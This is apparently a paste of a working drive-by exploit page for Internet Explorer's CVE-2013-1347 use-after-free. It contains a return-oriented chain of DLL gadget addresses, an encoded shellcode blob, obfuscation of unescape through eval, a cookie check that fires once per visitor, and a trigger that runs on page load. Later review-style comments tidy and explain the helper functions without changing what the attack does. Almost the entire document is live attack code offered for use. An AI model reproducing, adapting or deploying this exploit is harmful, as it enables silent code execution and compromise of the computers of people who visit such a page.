
MSIE Use After Free EXP/CVE-2013-1347

a guest Jul 10th, 2013 1,147 Never
  1.     <!doctype html>
  2.     <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
  3.     <head>
  4.     <meta>
  5.       <?IMPORT namespace="t" implementation="#default#time2">
  6.     </meta>
  7.  
  8.     <script>
    // Resolves unescape() by eval'ing its name instead of calling it by a
    // literal — presumably so a static scan for "unescape(" does not fire;
    // NOTE(review): the page gives no reason, so treat that as an inference.
    // From a detection standpoint the observable is eval() of a string
    // constant plus the CollectGarbage alias below, not the unescape name.
    // None of these three are declared with var, so they become globals.
    pRESSURA = eval('unescape');
    // Alias for the IE/JScript-only CollectGarbage(); helloWorld() calls it
    // through this alias before assigning the animation values.
    fAHPARIC = CollectGarbage;
    // "%u" escape prefix that rIGUARDI() prepends to each 4-hex-digit group.
    dISCESA = '%u';
    // Converts an 8-hex-digit string ("aabbccdd") into two UTF-16 code units
    // with the low 16 bits first: unescape("%uccdd%uaabb").  Relies on the
    // globals pRESSURA (the unescape alias) and dISCESA ("%u").
    function rIGUARDI(rEPLACEMENT) {
        var highWord = rEPLACEMENT.substring(0, 4);
        var lowWord = rEPLACEMENT.substring(4, 8);
        var escaped = dISCESA + lowWord + dISCESA + highWord;
        return pRESSURA(escaped);
    }
  15.  
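    // Formats a 32-bit value as exactly eight lowercase hex digits, most
    // significant byte first (0x77bd4cfa -> "77bd4cfa").  Out-of-range or
    // negative input is wrapped by the >>> / & operators exactly as before.
    //
    // Fix: the four intermediate strings were assigned without var and so
    // leaked into the global scope (and would throw a ReferenceError under
    // strict mode); they are now local to a small helper.
    function vILMENTE(tRIPARTITO) {
        // Zero-pad a single byte value (0..255) to two hex digits.
        function byteHex(b) {
            var s = b.toString(16);
            return s.length === 1 ? "0" + s : s;
        }
        return byteHex(tRIPARTITO >>> 24) +
               byteHex((tRIPARTITO >>> 16) & 0xff) +
               byteHex((tRIPARTITO >>> 8) & 0xff) +
               byteHex(tRIPARTITO & 0xff);
    }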
    // Encodes a 32-bit value as two UTF-16 code units, low word first
    // (0x77bd4cfa -> "\u4cfa\u77bd"): vILMENTE() renders the big-endian
    // hex digits and rIGUARDI() swaps the halves and unescapes them.
    function ue(dw) {
        var hexDigits = vILMENTE(dw);
        return rIGUARDI(hexDigits);
    }
  30.  
    // Writes the marker cookie that readc() checks for, with a three-day
    // expiry.  helloWorld() returns early while it is present, so the rest of
    // that function runs at most once per browser within that window.
    function setc() {
        var threeDaysMs = 3 * 24 * 3600 * 1000;
        var expiry = new Date();
        expiry.setTime(expiry.getTime() + threeDaysMs);
        document.cookie = "Cookie1=fucktheothers;expires=" + expiry.toGMTString();
    }
  36.  
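    // Returns 1 when the marker cookie written by setc() is present and 0
    // otherwise (kept as 0/1 rather than booleans — helloWorld() tests the
    // result directly).
    //
    // Fix: String(...) replaces new String(...) — same coercion of a missing
    // document.cookie to "undefined", but no wrapper object — and the
    // comparison uses ===.
    function readc() {
        var cookieString = String(document.cookie);
        return cookieString.indexOf("fucktheothers") === -1 ? 0 : 1;
    }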
  46.  
  47.     function DropPayload()
  48.     {
  49.           // en = 77c10000
  50.           // kr = 77bc0000
  51.           // offset = 50000
  52.           var r = "";
  53.           r+= ue( 0x77bd4cfa );  // # POP EBP # RETN [msvcrt.dll]
  54.           r+= ue( 0x77bd4cfa );  // # skip 4 bytes [msvcrt.dll]
  55.           r += ue( 0x77BFFA1C);  // # POP EBX # RETN [msvcrt.dll]
  56.           r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
  57.           for(i=0;i<=0x201;i++) {
  58.           r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
  59.           }
  60.           r+= ue( 0x77be4de1 );  // # POP EAX # RETN [msvcrt.dll]
  61.           r+= ue( 0x2cfe04a7 );  // # put delta into eax (-> put += 0x00000040 into edx)
  62.           r+= ue( 0x77bfeb80 );  // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
  63.           r+= ue( 0x77c08fbc );  // # XCHG EAX,EDX # RETN [msvcrt.dll]
  64.           r+= ue( 0x77bde33f );  // # POP ECX # RETN [msvcrt.dll]
  65.           r+= ue( 0x77c0e062 );  // # &Writable location [msvcrt.dll]
  66.           r+= ue( 0x77bf6116 );  // # POP EDI # RETN [msvcrt.dll]
  67.           r+= ue( 0x77bf7a42 );  // # RETN (ROP NOP) [msvcrt.dll]
  68.           r+= ue( 0x77beb8ba );  // # POP ESI # RETN [msvcrt.dll]
  69.           r+= ue( 0x77bdaacc );  // # JMP [EAX] [msvcrt.dll]
  70.           r+= ue( 0x77beb860 );  // # POP EAX # RETN [msvcrt.dll]
  71.           r+= ue( 0x77bc1120 );  // # ptr to &VirtualProtect() [IAT msvcrt.dll]
  72.           r+= ue( 0x77d03ad9);   // # PUSHAD # RETN [user32.dll]
  73.           r+= ue( 0x77c01025 );  // # ptr to 'push esp # ret ' [msvcrt.dll]
  74.  
  75.           return r;
  76.     }
  77.     function align_esp()
  78.     {
  79.       var r= "";
  80.       r += ue(0x77BFD801);
  81.       return r;
  82.     }
  83.     function xchg_esp()
  84.     {
  85.       var r="";
  86.       r += ue(0x77BC5ED5);
  87.       return r;
  88.     }
  89.     function helloWorld()
  90.     {
  91.       if (readc()) return;
  92.       setc();
  93.  
  94.       unicorn = unescape("ABCD");
  95.       unicorn2 = unescape("EEEE");
  96.       for (i=0; i < 2; i++) {
  97.         unicorn += unescape("ABCD");
  98.       }unicorn += unescape("AB");
  99.  
  100.       unicorn += DropPayload();
  101.       unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919";
  102.       animvalues = align_esp();
  103.  
  104.       for (i=0; i < 0x70/4; i++) {
  105.         if (i == 0x70/4-1) {
  106.           animvalues += xchg_esp();
  107.         }
  108.         else {
  109.           animvalues += align_esp();
  110.         }
  111.       }
  112.  
  113.       animvalues += unicorn;
  114.  
  115.       for(i = 0; i < 13; i++) {
  116.         animvalues += ";red";
  117.       }
  118.       f0 = document.createElement('span');
  119.       document.body.appendChild(f0);
  120.       f1 = document.createElement('span');
  121.       document.body.appendChild(f1);
  122.       f2 = document.createElement('span');
  123.       document.body.appendChild(f2);
  124.       document.body.contentEditable="true";
  125.       f2.appendChild(document.createElement('datalist'));
  126.       f1.appendChild(document.createElement('span'));
  127.       f1.appendChild(document.createElement('table'));
  128.       try{
  129.         f0.offsetParent=null;
  130.       }catch(e) {
  131.  
  132.       }f2.innerHTML="";
  133.       f0.appendChild(document.createElement('hr'));
  134.       f1.innerHTML="";
  135.  
  136.       fAHPARIC();
  137.  
  138.       try {
  139.         a = document.getElementById('myanim');
  140.         a.values = animvalues;
  141.       }
  142.       catch(e) {}
  143.     }
  144.    
  145.     </script>
  146.     </head>
  147.     <body onload="eval(helloWorld());">
  148.     <t:ANIMATECOLOR id="myanim"/>
  149.  
  150.     </body>
  151.     </html>
  152.  
  153. @PhysicalDrive0